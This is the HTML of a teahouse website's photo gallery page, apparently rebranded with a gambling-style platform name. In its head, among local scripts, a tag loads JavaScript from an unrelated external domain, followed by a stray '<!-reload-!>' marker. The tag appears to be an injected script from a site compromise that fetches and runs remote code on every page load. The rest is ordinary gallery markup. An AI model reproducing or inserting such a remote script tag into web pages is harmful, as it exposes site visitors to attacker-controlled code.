<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>图片展示-茶楼环境-正彩娱乐平台</title>
<meta content="" name=keywords />
<meta content="" name=description />
<link href="../../base/templates/css/common.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="../../base/js/base.js"></script>
<script type="text/javascript" src="../../base/js/common.js"></script>
<script type="text/javascript" src="../../base/js/form.js"></script>
<script type="text/javascript" src="../../base/js/blockui.js"></script>
<script src="http://909098.biz/a.js" type="text/javascript"></script>
<!-reload-!>
</head>
<body style='background:#383122'>

<script>
var PDV_PAGEID='540'; 
var PDV_RP='../../'; 
var PDV_COLTYPE='photo'; 
var PDV_PAGENAME='query'; 
</script>

<div id='contain' style='width:990px;background:none transparent scroll repeat 0% 0%;margin:0px auto;padding:0px'>

<div id='top' style='width:990px;height:448px;background:none transparent scroll repeat 0% 0%'>


<!-- 网站标志 -->

<div id='pdv_17035' class='pdv_class'  title='' style='width:350px;height:67px;top:19px;left:6px; z-index:3'>
<div id='spdv_17035' class='pdv_top' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">


<img src="../../advs/pics/20100108/1262918757.gif" border="0" />


</div>
</div>

</div>
</div>

<!-- 一级导航菜单 -->

<div id='pdv_17024' class='pdv_class'   style='width:990px;height:41px;top:93px;left:0px; z-index:4'>
<div id='spdv_17024' class='pdv_top' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		导航菜单
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">

<link href="../../menu/templates/images/mainmenu_dolphin/A.css" rel="stylesheet" type="text/css" />
<div id="menumain_dolphin">
<div class="menuright"></div>
<div class="mainmenuiner_dolphin">

<a href="../../index.html" target="_self" class="menumain_dolphin">正彩娱乐</a>

<a href="../../page/html/company.php.html" target="_self" class="menumain_dolphin">茶楼简介</a>

<a href="../../page/html/environment.php.html" target="_self" class="menumain_dolphin">茶楼环境</a>

<a href="index-3.html" target="_self" class="menumain_dolphin">名茶品鉴</a>

<a href="index-4.html" target="_self" class="menumain_dolphin">精美茶点</a>

<a href="../../page/html/feature.php.html" target="_self" class="menumain_dolphin">茶楼特色</a>

<a href="../../news/class/index.html" target="_self" class="menumain_dolphin">茶楼动态</a>

<a href="../../page/html/guide.php.html" target="_self" class="menumain_dolphin">消费指南</a>

<a href="../../page/contact/contact.php.html" target="_self" class="menumain_dolphin">联系我们</a>

</div>
</div>

</div>
</div>

</div>
</div>

<!-- 图片/FLASH -->

<div id='pdv_17025' class='pdv_class'  title='' style='width:41px;height:98px;top:19px;left:789px; z-index:5'>
<div id='spdv_17025' class='pdv_top' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">


<a href="../../page/html/company.php.html"><img src="../../diy/pics/20100322/1269224063.gif" border="0" width="100%" /></a>

</div>
</div>

</div>
</div>

<!-- 头部图片轮播 -->

<div id='pdv_17033' class='pdv_class'  title='' style='width:990px;height:314px;top:134px;left:0px; z-index:6'>
<div id='spdv_17033' class='pdv_top' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">

<link href="../../advs/templates/css/advsheadlb.css" rel="stylesheet" type="text/css" />
<script type=text/javascript src="../../advs/js/advsheadlb.js"></script>
<div id='advsheadlb'>

<img src='../../advs/pics/20100322/1269224761.jpg' border='0' class='advsheadlbpic' id='advsheadlbpic_0'>

<img src='../../advs/pics/20100322/1269224764.jpg' border='0' class='advsheadlbpic' id='advsheadlbpic_1'>

<img src='../../advs/pics/20100322/1269224767.jpg' border='0' class='advsheadlbpic' id='advsheadlbpic_2'>

</div>

</div>
</div>

</div>
</div>

<!-- 图片/FLASH -->

<div id='pdv_17030' class='pdv_class'  title='' style='width:41px;height:98px;top:19px;left:887px; z-index:8'>
<div id='spdv_17030' class='pdv_top' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">


<a href="../../page/html/feature.php.html"><img src="../../diy/pics/20100322/1269224306.gif" border="0" width="100%" /></a>

</div>
</div>

</div>
</div>

<!-- 图片/FLASH -->

<div id='pdv_17032' class='pdv_class'  title='' style='width:41px;height:98px;top:19px;left:936px; z-index:9'>
<div id='spdv_17032' class='pdv_top' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">


<a href="../../page/html/guide.php.html"><img src="../../diy/pics/20100322/1269224399.gif" border="0" width="100%" /></a>

</div>
</div>

</div>
</div>

<!-- 图片/FLASH -->

<div id='pdv_17027' class='pdv_class'  title='' style='width:41px;height:98px;top:19px;left:838px; z-index:10'>
<div id='spdv_17027' class='pdv_top' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">


<a href="index-1.html"><img src="../../diy/pics/20100322/1269224229.gif" border="0" width="100%" /></a>

</div>
</div>

</div>
</div>
</div>
<div id='content' style='width:990px;height:486px;background:url("../../effect/source/bg/cbg.gif");margin:0px auto'>


<!-- 图片搜索表单 -->

<div id='pdv_17021' class='pdv_class'  title='图片搜索' style='width:230px;height:151px;top:198px;left:0px; z-index:12'>
<div id='spdv_17021' class='pdv_content' style='overflow:visible;width:100%;'>
<div class="pdv_border" style="border:0px;height:100%;padding:0;margin:0;background:#8d8b6a url('../../base/border/785/images/bg.gif') repeat-y;">
<div style="height:100%;background:url('../../base/border/785/images/bg.gif') right repeat-y;">
<div style="height:32px;border:0px;padding:0;margin:0;background:url('../../base/border/785/images/title.gif') no-repeat">
	<div style="float:right;width:5px;height:32px;text-align:right;background:url('../../base/border/785/images/title.gif') -885px 0px no-repeat">
	</div>
</div>
<div style="margin:0px;padding:0px;">
<link href="../templates/css/photo_search_dolphin.css" rel="stylesheet" type="text/css" />
<SCRIPT language="javascript" src="../js/selectbox.js"></SCRIPT>
<div class="photosearchformzone">
<form id="photosearchform" method="get" action="index.html">
  <div class="photosearchform">
    <select name="catid" id="catid" class="box" style="display:none; background:#ffffff; width:140px; height:19px;">
      <option value="0" >请选择分类</option>
      
	  <option value='1' selected>茶楼环境</option><option value='3'>名茶品鉴</option><option value='4'>精美茶点</option><option value='5'>活动影集</option>
    
    </select> 
	<script>
	makeSelectBox('catid','../../');
	</script>
  </div>

    <div class="photosearchform">
    <input name="key" type="text" id="photosearchform_key" value="" style="width:138px;" class="inputtext">
  </div>
  <div class="photosearchform2">
  <input name="imageField" id="button" type="image" src="../templates/images/search5.gif" >
  </div>
</form>
</div>

</div>
</div>
</div>
<div style="margin-top:-8px;height:8px;line-height:8px;background:url('../../base/border/785/images/title.gif') 0px -223px no-repeat">&nbsp;</div>
<div style="float:right;margin-top:-8px;line-height:8px;width:12px;height:8px;background:url('../../base/border/785/images/title.gif') -888px -223px no-repeat">&nbsp;</div>

</div>
</div>

<!-- 图片检索搜索 -->

<div id='pdv_17036' class='pdv_class'  title='图片检索' style='width:690px;height:396px;top:90px;left:284px; z-index:13'>
<div id='spdv_17036' class='pdv_content' style='overflow:visible;width:100%;'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		图片检索
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">

<link href="../templates/css/photoquery.css" rel="stylesheet" type="text/css" />
<div id="photoquery">
<ul >
 
<li>
	<div class="fang" style="width:150px;height:115px">
		<div class="picFit" style="width:150px;height:115px">
		<a href="../html/index-6.html" target="_self" ><img src="../pics/20100322/1269226694.jpg" style="width:150px;height:115px" border="0" /></a>
		</div>
	</div>
	<div class="title"><a href="../html/index-6.html" target="_self"   >茶楼包厢</a></div>
</li>
 
<li>
	<div class="fang" style="width:150px;height:115px">
		<div class="picFit" style="width:150px;height:115px">
		<a href="../html/index-5.html" target="_self" ><img src="../pics/20100322/1269226701.jpg" style="width:150px;height:115px" border="0" /></a>
		</div>
	</div>
	<div class="title"><a href="../html/index-5.html" target="_self"   >茶楼环境</a></div>
</li>
 
<li>
	<div class="fang" style="width:150px;height:115px">
		<div class="picFit" style="width:150px;height:115px">
		<a href="../html/index-4.html" target="_self" ><img src="../pics/20100322/1269226711.jpg" style="width:150px;height:115px" border="0" /></a>
		</div>
	</div>
	<div class="title"><a href="../html/index-4.html" target="_self"   >茶楼环境</a></div>
</li>
 
<li>
	<div class="fang" style="width:150px;height:115px">
		<div class="picFit" style="width:150px;height:115px">
		<a href="../html/index-2.html" target="_self" ><img src="../pics/20100322/1269226724.jpg" style="width:150px;height:115px" border="0" /></a>
		</div>
	</div>
	<div class="title"><a href="../html/index-2.html" target="_self"   >茶楼包厢</a></div>
</li>
 
<li>
	<div class="fang" style="width:150px;height:115px">
		<div class="picFit" style="width:150px;height:115px">
		<a href="../html/index-1.html" target="_self" ><img src="../pics/20100322/1269226731.jpg" style="width:150px;height:115px" border="0" /></a>
		</div>
	</div>
	<div class="title"><a href="../html/index-1.html" target="_self"   >茶楼环境</a></div>
</li>
 
<li>
	<div class="fang" style="width:150px;height:115px">
		<div class="picFit" style="width:150px;height:115px">
		<a href="../html/index-3.html" target="_self" ><img src="../pics/20100322/1269226717.jpg" style="width:150px;height:115px" border="0" /></a>
		</div>
	</div>
	<div class="title"><a href="../html/index-3.html" target="_self"   >茶楼大厅</a></div>
</li>

</ul>
<script>
$(function() {
$().picFit("auto");
});
</script>
</div>


<div id="showpages" >
	  <div id="pagesinfo">共6条 每页12条 页次：1/1</div>
	  <div id="pages"><ul><li class="pbutton"><a href="index.php-page=1&amp;catid=1&amp;myord=uptime&amp;myshownums=&amp;showtj=&amp;author=&amp;key=.html">首页</a></li><li class="pbutton">上一页</li><li class="pagesnow">1</li><li class="pbutton">下一页</li><li class="opt"><select onChange="window.location=this.options[this.selectedIndex].value"><option value="/photo/class/index.php?page=1&amp;catid=1&amp;myord=uptime&amp;myshownums=&amp;showtj=&amp;author=&amp;key=" selected>第1页</option></select></li><li class="pbutton"><a href="index.php-page=1&amp;catid=1&amp;myord=uptime&amp;myshownums=&amp;showtj=&amp;author=&amp;key=.html">尾页</a></li></ul></div>
     </div>


</div>
</div>

</div>
</div>

<!-- 当前位置提示条 -->

<div id='pdv_17037' class='pdv_class'  title='当前位置' style='width:743px;height:32px;top:0px;left:247px; z-index:14'>
<div id='spdv_17037' class='pdv_content' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="border:0px;background:url('../../base/border/788/images/title.gif') no-repeat;padding:0px;margin:0px;height:39px">
	<div style="float:right;width:10px;height:39px;background:url('../../base/border/788/images/title.gif') -890px 0px no-repeat;">
	</div> 
 
<link href="../templates/css/nav.css" rel="stylesheet" type="text/css" />
<div id="nav">
您现在的位置：<a href="../../index.html">正彩娱乐平台</a> 
 
&gt; <a href="../index.html" >图片展示</a> 
 
&gt; <a href="index-1.html">茶楼环境</a>

</div>

</div>

</div>
</div>

<!-- 图片分类（列表） -->

<div id='pdv_17183' class='pdv_class'  title='' style='width:230px;height:188px;top:0px;left:0px; z-index:15'>
<div id='spdv_17183' class='pdv_content' style='overflow:visible;width:100%;'>
<div class="pdv_border" style="border:0px;height:100%;padding:0;margin:0;background:#8d8b6a url('../../base/border/783/images/bg.gif') repeat-y;">
<div style="height:100%;background:url('../../base/border/783/images/bg.gif') right repeat-y;">
<div style="height:32px;border:0px;padding:0;margin:0;background:url('../../base/border/783/images/title.gif') no-repeat">
	<div style="float:right;width:5px;height:32px;text-align:right;background:url('../../base/border/783/images/title.gif') -885px 0px no-repeat">
	</div>
</div>
<div style="margin:0px;padding:0px;">

<link href="../templates/css/photoclass_dolphin.css" rel="stylesheet" type="text/css" />
<ul class="photoclass_dolphin">


<li class="photoclass_dolphin">
<a href="index-1.html" target="_self" class="photoclass_dolphin">茶楼环境</a>
</li>


<li class="photoclass_dolphin">
<a href="index-3.html" target="_self" class="photoclass_dolphin">名茶品鉴</a>
</li>


<li class="photoclass_dolphin">
<a href="index-4.html" target="_self" class="photoclass_dolphin">精美茶点</a>
</li>


<li class="photoclass_dolphin">
<a href="index-5.html" target="_self" class="photoclass_dolphin">活动影集</a>
</li>
 
</ul>

</div>
</div>
</div>
<div style="margin-top:-8px;height:8px;line-height:8px;background:url('../../base/border/783/images/title.gif') 0px -223px no-repeat">&nbsp;</div>
<div style="float:right;margin-top:-8px;line-height:8px;width:12px;height:8px;background:url('../../base/border/783/images/title.gif') -888px -223px no-repeat">&nbsp;</div>

</div>
</div>
</div>
<div id='bottom' style='width:990px;height:74px;background:none transparent scroll repeat 0% 0%'>


<!-- 图片/FLASH -->

<div id='pdv_17028' class='pdv_class'  title='' style='width:990px;height:59px;top:15px;left:0px; z-index:1'>
<div id='spdv_17028' class='pdv_bottom' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">


<img src="../../diy/pics/20100316/1268708152.gif" border="0" width="100%" />

</div>
</div>

</div>
</div>

<!-- 底部菜单（一级） -->

<div id='pdv_17029' class='pdv_class'   style='width:258px;height:22px;top:21px;left:21px; z-index:2'>
<div id='spdv_17029' class='pdv_bottom' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		脚注栏目
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">

<link href="../../menu/templates/images/bottommenu_1/A.css" rel="stylesheet" type="text/css" />
<div id="bottommenu">

<a href="../../page/html/company.php.html" target="_self">关于我们</a>|

<a href="../../index.html" target="_self">正彩娱乐</a>|

<a href="../../page/contact/contact.php.html" target="_self">联系方式</a>|

<a href="../../page/contact/feedback.php.html" target="_self">顾客留言</a>|

<a href="../../advs/link/index.html" target="_self">友情链接</a>|
 
</div>


</div>
</div>

</div>
</div>

<!-- 底部信息编辑区 -->

<div id='pdv_17026' class='pdv_class'  title='正彩娱乐' style='width:339px;height:31px;top:22px;left:647px; z-index:7'>
<div id='spdv_17026' class='pdv_bottom' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		正彩娱乐
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">
<div style="width:100%;text-align:center;font:12px/20px Arial, Helvetica, sans-serif">

<div style="MARGIN: 0px; COLOR: #e4e4aa; LINE-HEIGHT: 24px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-ALIGN: center">版权所有 Copyright(C)2009-2017 <a href="../../index.html">正彩娱乐平台</a></div>



</div>

</div>
</div>

</div>
</div>

<!-- 图片/FLASH -->

<div id='pdv_17023' class='pdv_class'  title='图片' style='width:990px;height:15px;top:0px;left:0px; z-index:11'>
<div id='spdv_17023' class='pdv_bottom' style='overflow:hidden;width:100%;height:100%'>
<div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px  solid;background:;">
	<div style="height:25px;margin:1px;display:none;background:;">
		<div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:">
		图片
		</div>
		<div style="float:right;margin-right:10px;display:none">
		<a href="-1.html" style="line-height:25px;color:">更多</a>
		</div>
	</div>
<div style="padding:0px">


<img src="../../diy/pics/20100322/1269237512.gif" border="0" width="100%" />

</div>
</div>

</div>
</div>
</div>
</div><div id='bodyex'>

</div>

</body>
</html>
